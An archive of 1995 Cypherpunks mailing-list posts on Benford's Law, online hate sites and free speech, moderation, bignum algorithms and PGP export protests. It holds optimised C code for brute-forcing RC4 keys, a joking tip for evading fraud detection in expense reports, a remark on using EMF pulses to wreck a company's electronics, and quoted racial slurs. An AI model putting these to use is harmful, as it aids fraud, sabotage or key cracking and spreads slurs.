From hardin at cyberspace.com Tue Jul 11 11:16:17 1995 From: hardin at cyberspace.com (hardin at cyberspace.com) Date: Tue, 11 Jul 95 11:16:17 PDT Subject: Num Rat Message-ID: <9507111813.AA0253@localhost> John Young posted: > He's Got Their Number: Scholar Uses Math to Foil Financial > Fraud > > By Lee Berton > Mark Negrini, an assistant professor of accounting at St. > Mary's University in Halifax, is trapping tax cheats, check > forgers and embezzlers with an obscure theory known as > Benford's Law. Formulated by physicist Frank Benford in > 1938, the law lays out the statistical frequency with which > the numbers 1 through 9 appear in any set of random > numbers. > > Mr. Negrini applies the law to the numbers on suspicious > checks or tax returns. A series of legitimate check amounts > or tax write-offs will be genuinely random, while those > dreamed up by a human will not. If the numbers on the > checks or tax returns do not obey Benford's Law, they can't > be random, and "someone is taking the company to the > cleaners," Mr. Negrini says. I just looked @ the front of a M.O. computer catalog & the numerals in the prices are anything but random. A very heavy concentration of eights (8) & nines (9), apparently this company is more into $508.98 (color inkjet printer) & $38.98 (well known game s/w) than the old late night TV standby of "JUST $19.99!". Of course, this is because of excessively documented ad nauseum human psychological tendencies that salescritters, who set at least the lsd's of price, have been aware of for millenia. I'd bet, that 5(five), 8(eight), & 9(nine) are significantly more represented across the board in prices (& thus in amounts for checks & tax write offs) than than their random distribution by Benford's Law or more well known tests for randomness would suggest. Has Mr. Negrini factored this into his program? I guess the lesson is do a few pgp make__random's & convert a few of the hex numbers to dec digits for the lsd's the next time one does creative expense reporting. tjh From dmandl at bear.com Tue Jul 11 11:29:11 1995 From: dmandl at bear.com (David Mandl) Date: Tue, 11 Jul 95 11:29:11 PDT Subject: FW: Edupage 7/9/95 (fwd) Message-ID: <199507111828.AA08553@bear-gate.bear.com> "Perry E. Metzger" said: > Mark Contois writes: > > Would that this were so. There seems to be a burgeoning number of web > > sites spouting neo- (and not-so-neo-) Nazi disinfo. Check out > > > > http://204.181.176.4/stormfront/ > > > > and some of the links provided therein. > > 204.181.176.4 is "stormfront.wat.com". > > I suspect that something is amiss (i.e. faked) about the following, > but wat.com shows up as [etc.] That may be (I wouldn't be surprised if they registered their site with an innocent-sounding name to avoid trouble), but I know that those guys are definitely on the net. I've got their URL at home and I take a look at their stuff now and then, just to keep abreast of what those half-wits are up to. There are at least a few bona fide Nazi/White Power sites out there. --Dave. -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From loki at nately.UCSD.EDU Tue Jul 11 11:40:01 1995 From: loki at nately.UCSD.EDU (Lance Cottrell) Date: Tue, 11 Jul 95 11:40:01 PDT Subject: Obscura down for a few days. Message-ID: <9507111839.AA12751@nately.UCSD.EDU> -----BEGIN PGP SIGNED MESSAGE----- Obscura is suffering from HD troubles. The backups have failed so I am going to have to rebuild it from scratch. This means that the web page and remailer will be down. All mail to the remailers will be lost. I have changed the name server so I will still get mail sent to loki at obscura.com. -Lance -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMALFV1Vkk3dax7hlAQHPvAP6A7IWAczKJ3eimrWUgh0F5DMEr7oSpAXg lJJCC2VV4g9lIDD8C2wob1L6sEZwlDnUt6dMpbKBiT3aksSmBqnvMpe/BlaTd2zk ZRGCYHUZkx3aOSp9iZevRhjI0HEdm+g2+PwjJcMyPn5EUmz5vnPI9exOt9VGyJV1 eSCCC3Ngz9k= =ahD6 -----END PGP SIGNATURE----- From mjg51721 at uxa.cso.uiuc.edu Tue Jul 11 11:46:09 1995 From: mjg51721 at uxa.cso.uiuc.edu (Michael James Gebis) Date: Tue, 11 Jul 95 11:46:09 PDT Subject: A more sophisticated form of moderation. Message-ID: <199507111845.AA16926@uxa.cso.uiuc.edu> With all the recent traffic about if moderation is the future of the net, it seems like an appropriate idea to get some brainstorming on some better forms of moderation. Specifically, I was thinking along the lines of a newsgroup where only selected individuals are able to post, but anybody who wants to can read the group. However, the "selected individuals" could fall into several categories. You could have one or very few "selected individuals" and the newsgroup would work almost exactly like the current moderated groups. You could have many "selected individuals" who may have been selected by proving that they read a FAQ or some other minimal criteria, which could theoretically cut down on newbie fever. You could have several dozen "selected individuals" who are selected by some means (a committee? a vote? a "trusted individual who selects more individuals") and have an unrestricted talk between these individuals. This way, you have a newsgroup where these experts can discuss topics in an unrestricted way. I'm thinking along the lines of the "boards" in _Ender's Game_, where a newsgroup is somewhat similar to a newspaper. Once the reporters get hired, they have a lot of freedom on what they can report about. There are a lot of details to be worked out, including: 1) Can such a system work? Are there protocols which can guarantee authentication on a large distributed system like news? I'm assuming that there would have to be some sort of cryptographic authentication to prevent wide-scale abuse. 2) Is such a system desirable? Is the current "anybody can post anywhere if they know how" system better? Which one promotes cypherpunk goals more? Can I anonymously prove that I am a "selected individual"? Remember, I'm considering this a brainstorming session, so I'd like to hear any comments you may have. -- Mike Gebis m-gebis at uiuc.edu Mean people suck. http://www.uiuc.edu/ph/www/m-gebis/ From jim at acm.org Tue Jul 11 11:52:02 1995 From: jim at acm.org (Jim Gillogly) Date: Tue, 11 Jul 95 11:52:02 PDT Subject: Moby ints [Re: Num Rat] In-Reply-To: <199507111749.KAA03281@ionia.engr.sgi.com> Message-ID: <199507111851.LAA18222@mycroft.rand.org> > pjm at ionia.engr.sgi.com (Patrick May) writes: > This invocation of the name of the diety reminds me of a question > I've been meaning to ask. Is Knuth still a good source of algorithms > for implementing large integers or do more recent books exist that > contain superior methods? While Knuth is now and forever the algorithm deity in general, Arjen Lenstra is as close to godhood as one can get in moby ints these days. I'd look at the Lip package Lenstra wrote; it's used in his state of the art factoring programs. It's available with masses of PostScript documentation from ftp.ox.ac.uk. Studying the code and docs might remind you of some issues that aren't obvious... and, of course, you might decide you don't need to write a moby int package, but could just use his library. Jim Gillogly Hevensday, 18 Afterlithe S.R. 1995, 18:48 From lws+ at transarc.com Tue Jul 11 12:06:57 1995 From: lws+ at transarc.com (Lyle Seaman) Date: Tue, 11 Jul 95 12:06:57 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: <9507111658.AA06104@elysion.iaks.ira.uka.de> Message-ID: danisch at ira.uka.de (Hadmut Danisch) writes: > There are certain nazi pages in America. They were showing them in > a german tv magazine some time ago, but they didn't tell the URLs. > The URL field in the Mosaic window was painted over. Oh dear. There are certain smut pages in Germany. They were showing them on TV recently, but I couldn't quite catch the URL. I can see it now -- the US government censors the net to keep out the Germans (but the tourists can still come -- hey, at an average of $80K/year annual income, they're welcome to go shopping in New York, though if they want to change clothes on the beach they have to do *that* in California, Florida is right out, eh Lawton?) and the Germans censor the net to keep out the Americans. Oh dear. -- Lyle Transarc 707 Grant Street 412 338 4474 The Gulf Tower Pittsburgh 15219 From zinc at zifi.genetics.utah.edu Tue Jul 11 12:22:22 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Tue, 11 Jul 95 12:22:22 PDT Subject: Num Rat In-Reply-To: <9507111813.AA0253@localhost> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 11 Jul 1995 hardin at cyberspace.com wrote: > John Young posted: > > > He's Got Their Number: Scholar Uses Math to Foil Financial > > Fraud > > > prices are anything but random. A very heavy concentration of eights (8) & > nines (9), apparently this company is more into $508.98 (color inkjet printer) > & $38.98 (well known game s/w) than the old late night TV standby of > "JUST $19.99!". Of course, this is because of excessively documented > ad nauseum human psychological tendencies that salescritters, who set at > least the lsd's of price, have been aware of for millenia. I'd bet, that > 5(five), 8(eight), & 9(nine) are significantly more represented across > the board in prices (& thus in amounts for checks & tax write offs) than > than their random distribution by Benford's Law or more well known tests > for randomness would suggest. Has Mr. Negrini factored this into his program? > I guess the lesson is do a few pgp make__random's & convert a few of the > hex numbers to dec digits for the lsd's the next time one does creative expense > reporting. check amounts will also include any relevant sales tax thus skewing the distribution in some fashion. patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER ME for my pgp public key ** CRYPTO FOR THE MASSES! zifi is a 486 DX4-100 running LINUX 1.2.10, send me all of your RAM now! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMALPYk3Qo/lG0AH5AQE5PAP/fKnoVXL4SiCR5yv0NK0lUcdxW30q3NOL ZSg+CnDWdW4QEbTGe6yi8mxcAQRQuxXwikL1qtfFrYgxhEN2nTiD2TrAuzRUbBOJ c5X5ieC2drPUpITRUI6NvQA9H7IO7FRzQXH46RLosYpN4zy6EfzskbTZM/Zbj3cU Wg7XHHFZcUo= =+upl -----END PGP SIGNATURE----- From erc at khijol.intele.net Tue Jul 11 12:50:48 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Tue, 11 Jul 95 12:50:48 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: Message-ID: On Tue, 11 Jul 1995, Al Thompson wrote: > At 10:44 AM 7/11/95 -0400, Perry E. Metzger wrote: > > > >Brad Dolan writes: > >> REGULATING THE INTERNET > >> Shortly after the Communications Decency Act came before the U.S. Senate., > >> Canada's Parliament passed a resolution unanimously committing legislators > >> to get tough with on-line hate-mongering. The Simon Weisenthal Centre in > >> Toronto sent a strongly worded report to federal regulator the CRTC calling > >> for strict regulation of the Internet. (Montreal Gazette 7/7/95 B3) > > > >I'm happy to see Nazism fought with fascism. > > > >.pm > > You mean alleged nazism fought with obvious facism. > > I've never seen any actual nazism on the net anywhere, but this "strict > regulation" tactic is obviously fascist in nature. > > In fact, the only religious-based hate speech I've ever seen on the net is from > someone named "windgate" or something who hates Christians and Christianity, > and > is more than happy to write about his hatred. He hangs out in some of the > 'alt.politics' groups. You oughta go out and borrow someone's shortwave radio or ham HF radio. Between 3900 and 3900 KHz every evening, a bunch of guys in the south (Texas, New Mexico, Arkansas, Louisiana) get on the air and talk about the "goddamn niggers, jews, and fags that are ruining this country." All kinds of folks (meaning non-WASPs, of course) are targeted for this kind of spew. Words like "motherfucker" are often used, especially against "niggers". The speakers rail against "white women with goddamn niggers", and any other non-WASP who happens to arouse their ire. Quite entertaining if you enjoy that sort of thing. Stomach-turning if you don't. Call signs, times and frequencies heard upon request. This sort of thing has been going on for years. A few years back, the FCC attempted to go after a couple of idiots on one of the local LA area 2m repeaters who were spewing all kinds of filth out onto the air waves. The district court said, naaah, that's free speech. So, if the idiots in Congress want to go after this sort of thing, they oughts go after the few hams that are ruining the hobby for the rest of us. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From aba at dcs.exeter.ac.uk Tue Jul 11 13:10:28 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 11 Jul 95 13:10:28 PDT Subject: Down with ITAR - Have YOU exported PGP today? (fwd) Message-ID: <12883.9507112010@exe.dcs.exeter.ac.uk> This is a forward of something I just cross-posted to alt.security.pgp, and talk.politics.crypto. Civil disobedience via illegal .sigs. Adam ====================================================================== From: aba at dcs.ex.ac.uk Newsgroups: alt.security.pgp,talk.politics.crypto Date: Tue, 11 Jul 95 21:03:53 +0100 Subject: Down with ITAR - Have YOU exported PGP today? Distribution: world You all know about the ridiculous US regulation called ITAR and how it applies to crypto software in the US, well here's a fun and relatively safe (YMMV) way for you to export PGP in protest. It is just a token effort, and of 0 practical significance, but the idea is that you just post 3 lines of the uuencoded zipped DOS PGP executable in place of your usual sig in protest. If they lock you up for 3 uuencoded lines which came off a European ftp site and European web page, then well they are stupid. More to the point it would make them (the US state department and the NSA) look stupid. Take a look at this web page: http://dcs.ex.ac.uk/~aba/export/ it will dole out uuencoded parts of PGP.EXE (the DOS binary for pgp2.6.2i, the international version of PGP, as is available from myriads of non-US ftp sites). See my sig for a sample, the first in a long stream hopefully, And remember, say NO to key escrow :-) Adam -- ------------------ PGP.ZIP Part [000/713] ------------------- begin 644 pgp.zip M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From adam at bwh.harvard.edu Tue Jul 11 13:26:13 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 11 Jul 95 13:26:13 PDT Subject: Down with ITAR - Have YOU exported PGP today? (fwd) In-Reply-To: <12883.9507112010@exe.dcs.exeter.ac.uk> Message-ID: <199507112023.QAA19240@bwnmr5.bwh.harvard.edu> | This is a forward of something I just cross-posted to alt.security.pgp, | and talk.politics.crypto. Civil disobedience via illegal .sigs. Just to pick a nit, the sig is not illegal. The ITAR prior restraints on free speech are. Adam (Proud owner of part 001. Get yours today!) -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From alt at iquest.net Tue Jul 11 13:30:59 1995 From: alt at iquest.net (Al Thompson) Date: Tue, 11 Jul 95 13:30:59 PDT Subject: FW: Edupage 7/9/95 (fwd) Message-ID: At 01:45 PM 7/11/95 +0100, Ed Carp [khijol Sysadmin] wrote: >You oughta go out and borrow someone's shortwave radio or ham HF radio. >Between 3900 and 3900 KHz every evening, a bunch of guys in the south >(Texas, New Mexico, Arkansas, Louisiana) get on the air and talk about the >"goddamn niggers, jews, and fags that are ruining this country." All >kinds of folks (meaning non-WASPs, of course) are targeted for this kind >of spew. Words like "motherfucker" are often used, especially against >"niggers". The speakers rail against "white women with goddamn niggers", >and any other non-WASP who happens to arouse their ire. > >Quite entertaining if you enjoy that sort of thing. Stomach-turning if >you don't. Call signs, times and frequencies heard upon request. I don't enjoy it, and don't particularly care to hear it - HOWEVER, I don't see that they are harming anyone (I don't count "hurt feelings as "harm), any more than Malcolm X did when he called all white people "the devil," or when the militant Muslims do when they call all non-Muslims "heathens" or "the infidel" who should be killed. (or any more than wingate does when he says all non-Jews should be done away with). They are simply trying to "sell" their views by exposing their views. If they want to think that, and if they want to say that, then that is their business. I'm free to listen, or to avoid listening. I can avoid their newsgroups, or turn off my radio. That doesn't mean I have to like them, or be nice to them - I am just as free to ridicule their views, and I won't care if I hurt their feelings. If this sort of speech is regulated however, I will no longer have that choice. If I ask the government to prevent them from speaking their views, them only *I* am free to speak mine, so who is the victim? From hardin at cyberspace.com Tue Jul 11 14:40:03 1995 From: hardin at cyberspace.com (hardin at cyberspace.com) Date: Tue, 11 Jul 95 14:40:03 PDT Subject: Num Rat Message-ID: <9507112126.AA0326@localhost> //--- forwarded letter ------------------------------------------------------- > MIME-Version: 1.0 > Date: Tue, 11 Jul 95 13:22:33 -0600 > From: "zinc" > To: hardin at cyberspace.com > Cc: cypherpunks at toad.com > Subject: Re: Num Rat Pat Finerty wrote: > On Tue, 11 Jul 1995 hardin at cyberspace.com wrote: > > > John Young posted: > > > > > He's Got Their Number: Scholar Uses Math to Foil Financial > > > Fraud > > > [snip] > > I'd bet, that > > 5(five), 8(eight), & 9(nine) are significantly more represented across > > the board in prices (& thus in amounts for checks & tax write offs) than > > than their random distribution by Benford's Law or more well known tests > > for randomness would suggest. [snip] > > check amounts will also include any relevant sales tax thus skewing the > distribution in some fashion. > > > patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu > U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! [snip] Yes, and some vendors will be in state (sales tax) & some out of state (no sales tax). Furthermore, if the vendor is in state but in a different locale, there will probably be some difference in sales tax rates as rates within states are usually based on vendor location. Also some types of purchases for some types of businesses/organizations/entities have various sales tax exemptions or surcharges, again all of which varies by state & locality. ALL of these factors will skew the distribution, eg. sales tax is usualy *.00% or *.25%, *.50%, *.75% etc. so a cursory look shows that 0 & 5 will be over represented due to this factor. tjh From hardin at cyberspace.com Tue Jul 11 15:14:24 1995 From: hardin at cyberspace.com (hardin at cyberspace.com) Date: Tue, 11 Jul 95 15:14:24 PDT Subject: PGP Anti- ITAR sig Message-ID: <9507112213.AA0351@PPP53-139.cyberspace.com> Great Idea, Adam! I am #5, who is #6 ;-) tjh "T. J. Hardin" This is 1/713 of PGP262i DOS Executable Zipfile UUE'd Violate the Un-Constitutional ITAR Today! Get YOUR chunk @ web site below. ------------------ PGP.ZIP Part [005/713] ------------------- M at UIXP9EW\".^Q0XL1SO8"^*_O:U-=H(P&2,1A6YHB?KP@@H2/)$+P at -"($GRAT$8246(Q:3 ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From sebaygo at intellinet.com Tue Jul 11 15:19:33 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Tue, 11 Jul 95 15:19:33 PDT Subject: Stormfront (was Re: FW: Edupage 7/9/95 (fwd)) In-Reply-To: <9507111744.AA09457@snark.imsi.com> Message-ID: On Tue, 11 Jul 1995, Perry E. Metzger wrote: > Mark Contois writes: > > > http://204.181.176.4/stormfront/ > > > > and some of the links provided therein. > > 204.181.176.4 is "stormfront.wat.com". > > I suspect that something is amiss (i.e. faked) about the following, > but wat.com shows up as > > Wongs Advanced Technologies (WAT-DOM) > 3221 Danny Pk > Metairie, LA 70002 > > Domain Name: WAT.COM I've seen the URL for the Stormfront White Nationalist Resource Page listed at least three different ways. I've never tried to visit the site, but here are the three variations with the most recent one I've seen listed last. http://www.accesscom.net/stormfront/ http://www.stormfront.wat.com/stormfront/ or http://stormfront.wat.com/stormfront/ (my notes are kind of scrambled) htttp://www.stormfront.org/stormfront/ AR _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ "They that can give up essential liberty to : purchase a little temporary safety, deserve : Allen Robinson neither liberty nor safety." : sebaygo at intellinet.com - Benjamin Franklin, 1759 : PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A available via major keyservers From rfreeman at netaxs.com Tue Jul 11 16:12:14 1995 From: rfreeman at netaxs.com (Richard Freeman) Date: Tue, 11 Jul 95 16:12:14 PDT Subject: Don't trust the net too much Message-ID: <199507112312.TAA19079@access.netaxs.com> Adam Shostack wrote: > I hate to join any thread which talks about blowing up rooms >and killing security guards, but I'll point out that for a few >hundered dollars worth of transmitter parts, you can cause transient >failures with EMF pulse weapons, and for a bit more, you can fry all >the electronics, then drive away before they have any idea that their >company has been destroyed. > > Killing people is a stupid way to accomplish things. I would have to agree, and since this whole thread seems to be one of those conspiracy things, it is completely unnecessary to cause much at all in the way of physical damage. No matter who rents the T1 lines and other forms of communication that unite an ISP with the rest of the world, sooner or later they have to enter some sort of communications node. This could be a satellite or some huge telephone routing center, or any number of things. If the government wanted you shut down, all they have to do is find one of these things for each redundant line to an ISP and cut them all simultaneously. I am sure a court order could be obtained very quickly to arrange such a thing, and even this may not be necessary. I read in some magazine about ten years ago that all US-launched communications satellites contain software that allows the government to ascertain direct control over their functioning. The purpose stated was that in the event of war the US is highly dependent on commercial satellites for non-military communications and can not afford to have the Soviets (or whatever foreign power) trying to reprogram our satellites utilizing security loopholes on the part of the owning company. In any case, unless the ISP is actually expecting some terrorist group to attack their center and has taken deliberate steps to protect themselves (an absurdly expensive proposition for just about anyone except the military), I doubt there is much that could prevent even a private citizen from taking them out, let alone a well-organized group. ----------------------------------------------------------------- Richard T. Freeman - finger for pgp key 3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman From rjc at clark.net Tue Jul 11 16:32:29 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 11 Jul 95 16:32:29 PDT Subject: Moby ints [Re: Num Rat] In-Reply-To: <199507111851.LAA18222@mycroft.rand.org> Message-ID: <199507112331.TAA12573@clark.net> The state of the art in multiprecision integer arithmetic is Scho"nhage. Schonhage invented the all-integer Fast-Fourier-Transform based big-int multiplication method. An n-bit can be multiplied in O(n ln n) operations. This is a big improvement over the Karatsuba method which is O(n^1.5) and the classical method O(n^2). Surprisingly, the constant factor isn't that large. This can be combined with modmult techniques for fast modexp routines. However, it's only worthwhile for large numbers (>512 bits). At n=512, if your bigints are stored as polynomials with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64 (so the FFT method and the Karatsuba method are equivalent for numbers of that size) If you are dealing with 2048 or 4096 bit keys, it starts to look attractive. Schonhage published a book in the last year, the result of more than 10 years of research into this area. It's hard to get a hold of though, you have to order it from germany. 95-133299: Schonhage, Arnold. Fast algorithms : a multitape Turing machine implementation / Mannheim : B.I. Wissenschaftsverlag, c1994. x, 297 p. : ill. ; 25 cm. From nobody at valhalla.phoenix.net Tue Jul 11 17:35:20 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Tue, 11 Jul 95 17:35:20 PDT Subject: proxy down? Message-ID: <199507120035.TAA28618@ valhalla.phoenix.net> Recent attempts to use the AOL proxy service have failed (it used to work perfectly). Anybody else notice this? Is anybody running a proxy2proxy setup? From pgf at tyrell.net Tue Jul 11 17:41:22 1995 From: pgf at tyrell.net (Phil Fraering) Date: Tue, 11 Jul 95 17:41:22 PDT Subject: My Experience with Moderated Lists and Groups In-Reply-To: Message-ID: <199507120037.AA29650@tyrell.net> (Forgive me if you've seen this twice... I got disconnected the first time). From: tcmay at sensemedia.net (Timothy C. May) Sender: owner-cypherpunks at toad.com Precedence: bulk I've been on several moderated mailing lists. There are those who moderate very lightly, moderately, and heavily. I guess the first uses regular water as the moderator, and the latter some sort of deuterated water. My nuclear physics is a little rusty, though, so I have to ask: does the "moderately" moderated system use liquid sodium? Phil From dave at esi.COM.AU Tue Jul 11 18:41:40 1995 From: dave at esi.COM.AU (Dave Horsfall) Date: Tue, 11 Jul 95 18:41:40 PDT Subject: My Experience with Moderated Lists and Groups In-Reply-To: <199507111647.JAA01880@ix6.ix.netcom.com> Message-ID: On Tue, 11 Jul 1995, Bill Stewart wrote: > Remember when the alt.network got started? One of the first two groups > that led to its founding was alt.sources [...] > The other was one of the recipes newsgroups, where there was a bit more > controversy. I thought one of them was alt.drugs? -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From jamesd at echeque.com Tue Jul 11 18:42:01 1995 From: jamesd at echeque.com (James A. Donald) Date: Tue, 11 Jul 95 18:42:01 PDT Subject: Moby ints [Re: Num Rat] Message-ID: <199507120139.SAA07236@shell1.best.com> At 07:31 PM 7/11/95 -0400, Ray Cromwell wrote: > However, it's only worthwhile for large > numbers (>512 bits). At n=512, if your bigints are stored as polynomials > with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64 > (so the FFT method and the Karatsuba method are equivalent for numbers > of that size) I conjecture that the constant factor is rather smaller for the Karatsuba method, so the turnover should be somewhat higher than 512 bits. Does anyone have any real experimental data on this question. I assume Schonage has real experimental data? -- ------------------------------------------------------------------ We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state.| jamesd at echeque.com From tn0s+ at andrew.cmu.edu Tue Jul 11 18:48:06 1995 From: tn0s+ at andrew.cmu.edu (Timothy L. Nali) Date: Tue, 11 Jul 95 18:48:06 PDT Subject: Speedup of bruterc4.c In-Reply-To: <9507111715.AA20916@netmail2.microsoft.com> Message-ID: <4k0ma8K00iWS06o=cO@andrew.cmu.edu> For linux boxes (or perhaps 486 and pentium machines in general), try adding the flag -funroll-all-loops to the compile line. gcc -O2 -funroll-all-loops -m486 -o brute bruterc4.c Here are my results on a Linux 486/33 Original code (Adam+Tatu) : 5405 keys/sec Original code with -funroll-all-loops : 5991 keys/sec Original code with Russell's changes and a couple of my own and -funroll-all-loops : 6393 keys/sec Here are the changes I made: If we assume that the length of the cyphertext and known text is less than 256 bytes, then the following works. This gives you a whopping 40 additional keys/sec. --------------------------------------------------------------------------- int rc4_eq(unsigned char *buffer_ptr, unsigned char *known, unsigned char *cypher_txt, int buffer_len, rc4_key *key) { unsigned int t; unsigned int y = 0; unsigned char* state; unsigned int xorIndex; unsigned int counter; state = &key->state[0]; for(counter=0;counter < buffer_len;counter++) { y = (state[counter+1] + y) & 0xFF; swap_byte(state[counter+1], state[y]); xorIndex = (state[counter+1] + state[y]) & 0xFF; buffer_ptr[counter] ^= state[xorIndex]; if (known[counter] != buffer_ptr[counter]) { memcpy(buffer_ptr,cypher_txt,counter+1); return 0; } } return 1; } -------------------------------------------------------------------------- Also, I could not get Russell's changes to work exactly as he posted them (I suspect it's because I'm using a very old linux system). Here's my prepare_key function. I basically took out the counter++ parts. -------------------------------------------------------------------------- /* excellent optimised prepare key by Tatu Ylonen ylo at cs.hut.fi */ void prepare_key(unsigned char *key_data_ptr, int key_data_len, rc4_key *key) { unsigned int t; unsigned int index2; unsigned char* state; unsigned int counter; unsigned int k0, k1, k2, k3, k4; state = &key->state[0]; memcpy(state,sequence,256); index2 = 0; k0 = key_data_ptr[0]; k1 = key_data_ptr[1]; k2 = key_data_ptr[2]; k3 = key_data_ptr[3]; k4 = key_data_ptr[4]; for(counter = 0; counter < 255; counter+=5) { t = state[counter]; index2 = (index2 + k0 + t) & 0xff; state[counter] = state[index2]; state[index2] = t; t = state[counter + 1]; index2 = (index2 + k1 + t) & 0xff; state[counter + 1] = state[index2]; state[index2] = t; t = state[counter + 2]; index2 = (index2 + k2 + t) & 0xff; state[counter + 2] = state[index2]; state[index2] = t; t = state[counter + 3]; index2 = (index2 + k3 + t) & 0xff; state[counter + 3] = state[index2]; state[index2] = t; t = state[counter + 4]; index2 = (index2 + k4 + t) & 0xff; state[counter + 4] = state[index2]; state[index2] = t; } t = state[255]; index2 = (index2 + k0 + t) & 0xff; state[255] = state[index2]; state[index2] = t; } ------------------------------------------------------------------------ _____________________________________________________________________________ Tim Nali \ "We are the music makers, and we are the dreamers of tn0s at andrew.cmu.edu \ the dreams" -Willy Wonka and the Chocolate Factory From alt at iquest.net Tue Jul 11 20:02:51 1995 From: alt at iquest.net (Al Thompson) Date: Tue, 11 Jul 95 20:02:51 PDT Subject: RACIST MILITIA: ATF Message-ID: >> From owner-roc at xmission.com Tue Jul 11 11:10:37 1995 >> Date: Tue, 11 Jul 1995 13:45:37 -0400 (EDT) >> From: Ian Goddard >> To: Libernet at Dartmouth.edu >> > >Header deleted for brevity > >> (please re-post) >> >> ATF SUMMER CAMP A HOTBED OF RACIAL HATE >> >> The Washington Times (7/11/95) reports that despite a pending lawsuit >> against the ATF for racism, a summer camp for ATF agents called the >> "Good O' Boys Roundup" was still awash with racist sentiment. >> >> All who attended were welcomed at the entrance with many racist signs, >> including one that read: >> >> "Nigger Check Point" >> >> The ATF camp maintains a whites only policy. All black ATF agents who >> attempted to attend were turned away. White agents inside were reportedly >> "real mad" about the attempts of black agents to attend. That the signs >> were hung at the entrance indicates that all who attended had no problem >> with the ATF's promotion of hard-core racism at the retreat. >> >> There were many T-shirts promoting racial hatred and murder on sale at the >> ATF summer camp, such as one with a target superimposed over the face of >> Martin Luther King Jr. It would seem that the ATF approves of the killing >> of Dr. King. >> >> Also available at the ATF hate camp were "Nigger Hunting Licenses." >> If promoting the murder of black leaders is not bad enough, ATF agents >> even promote random killings of blacks. >> >> In a vain attempt to distance the ATF from the promotion of racial hate >> and murder at the ATF summer camp, ATF spokesman Earl Woodham claimed the >> event has never been sanctioned by the ATF. However, for years the local >> ATF office has been the place to send in registration fees and to call >> for info about the ATF summer hate camp. The agents at this office declined >> to say if they ever attended one of the "round ups" over the years. >> >> One ATF official said "I am not surprised about the signs or other activities >> [at the camp]." A former law enforcement officer who has attended the >> camp this year and in the past said, "The roundup has been a place for law >> enforcement personnel to go and let their hair down." So it would seem that >> hatred and a lust for murdering oppressed people reflects the true nature >> of these "law enforcement" personnel. "Jack-booted thugs" is soft-balling it. >> >> The pending lawsuit launched by 15 plaintiffs charges that KKK information >> and "Nigger Hunting Licenses" have been displayed in many ATF offices. The >> suit also claims widespread racial slurs and harassment by ATF personnel. >> >> All information presented here is derived from The Washington Times >> (7/11/95) front page article "Racist ways die hard at lawmen's retreat." >> >> PLEASE RE-POST FAR AND WIDE >> >> -- Ian Goddard >> >> > > > > From adwestro at ouray.cudenver.edu Tue Jul 11 20:16:51 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Tue, 11 Jul 95 20:16:51 PDT Subject: Denver area meeting, Saturday, 7/15, 2 pm Message-ID: Once again, we'll congregate in the food court at the Tivoli, adjacent to the Auraria campus, and possibly wander elsewhere. We'll probably get updates on the David Triska and New Order prosecutions, which have interesting 1st and 4th Amendment ramifications, but there's no specific agenda. Send email for directions, etc. Oh yeah, this goes out to "Louie da Misnamed" Freeh and the Overseers of Freehdom, for their unceasing vigilance regarding the transnational dissemination of Politically Incorrect Bits: ------------------ PGP.ZIP Part [006/713] ------------------- MPTGLPBHDHSW<(,"($GRAT$8246(Q:3 